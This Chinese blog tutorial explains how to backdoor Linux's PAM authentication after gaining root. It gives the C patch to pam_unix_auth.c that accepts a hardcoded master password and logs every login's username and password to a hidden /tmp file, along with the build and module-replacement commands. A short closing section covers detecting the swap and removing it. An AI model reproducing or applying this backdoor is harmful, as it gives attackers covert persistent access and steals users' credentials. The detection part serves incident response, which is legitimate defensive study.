LINUX留后门--— PAM后门

关注安全
0 489

一、本教程作用

1、用在攻击的途径上

2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?

不知攻,焉知防

二、PAM后门-教程

前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限

靶机 IP: 192.168.160.144 (centos7)

攻击IP: 192.168.160.1 (win10 xhell)

2.1 pam介绍

在过去,我们想要对一个使用者进行认证 (authentication),得要要求用户输入账号口令, 然后透过自行撰写的程序来判断该账号口令是否正确。也因为如此,我们常常得使用不同的机制来判断账号口令, 所以搞的一部主机上面拥有多个各别的认证系统,也造成账号口令可能不同步的验证问题! 为了解决这个问题因此有了 PAM (Pluggable Authentication Modules, 嵌入式模块) 的机制!

PAM 可以说是一套应用程序编程接口 (Application Programming Interface, API),他提供了一连串的验证机制,只要使用者将验证阶段的需求告知 PAM 后, PAM 就能够回报使用者验证的结果 (成功或失败)。由于 PAM 仅是一套验证的机制,又可以提供给其他程序所呼叫引用,因此不论你使用什么程序,都可以使用 PAM 来进行验证,如此一来,就能够让账号口令或者是其他方式的验证具有一致的结果!也让程序设计师方便处理验证的问题。

从pam的介绍中,我们知道,其实登录系统的时候,是pam的模块来验证我们的密码是否正确的。所以就存在这样一种可能,修改pam的验证逻辑,来达到一定条件下不去跟shadow里的密码校验,而是直接返回验证正确,从而达到作为后门的目的。(借用大佬的介绍不写了。)

2.2 植入 PAM 后门

第一步:

在 centos7 环境下,首先需要关闭 selinux 和临时关闭 setenforce 0。

setenforce 0

    1

在这里插入图片描述

在这里插入图片描述

第二步:查看 pam 版本号

发现是 1.1.8 版本

rpm -qa|grep pam

    1

在这里插入图片描述

第三步:下载对应版本的 pam 源码包

pam下载地址:http://www.linux-pam.org/library/

选择 pam1.1.8

wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

    1

在这里插入图片描述

解压 PAM tar包

tar -zxvf Linux-PAM-1.1.8

    1

    2

在这里插入图片描述

第四步:安装gcc编译器和flex库

yum install gcc flex flex-devel -y

    1

在这里插入图片描述

第五步:留 PAM 后门和保存 ssh登录的账户密码

修改 Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c 源码实现自定义密码认证和保存登录密码

if(strcmp("fuckyou",p)==0){return PAM_SUCCESS;}

        if(retval == PAM_SUCCESS){    

           FILE * fp;    

           fp = fopen("/tmp/.sshlog", "a");    

           fprintf(fp, "%s : %s\n", name, p);    

           fclose(fp);}

    1

    2

    3

    4

    5

    6

    7

在这里插入图片描述

第六步:编译

cd ..

cd ..

./configure

    1

    2

    3

在这里插入图片描述

make

    1

在这里插入图片描述

第七步:备份原有的 pam_unix.so

防止出现错误 ssh 登录不上了

cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bakcp

    1

在这里插入图片描述

第八步:复制新 PAM 模块到 /lib64/security/ 目录下:

cp /Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so

    1

    2

在这里插入图片描述

第九步:登录测试

本地登录测试

ssh root@127.0.0.1

    1

在这里插入图片描述

远程登录测试

在这里插入图片描述

查看 ssh 登录账号密码保存位置,root 账户的密码被成功保存

ls -a

cat .sshlog

    1

    2

在这里插入图片描述

三、PAM 后门——应急响应发现

第一步:查看可以连接

natstat -anpt

    1

在这里插入图片描述

第二步:检查pam_unix.so的修改时间

因为 pam 后门是替换文件,所以查看文件的修改时间,如果为最近的时间就是被替换了。(没有可以连接的时候也可以查看)

stat /lib/security/pam_unix.so      #32位

stat /lib64/security/pam_unix.so    #64位

    1

    2

如图所示,时间就是最近的时间,有问题。

在这里插入图片描述

第三步:清除 pam 后门

yum reinstall pam

    1

在这里插入图片描述

再次 xhell 连接,提示登录不成功,后门被清除

在这里插入图片描述

更多资源:

1、web安全工具、渗透测试工具

2、存在漏洞的网站源码与代码审计+漏洞复现教程、

3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频

4、应急响应真实案例复现靶场与应急响应教程

————————————————

版权声明:本文为CSDN博主「W小哥1」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。

原文链接:https://blog.csdn.net/weixin_40412037/article/details/118728788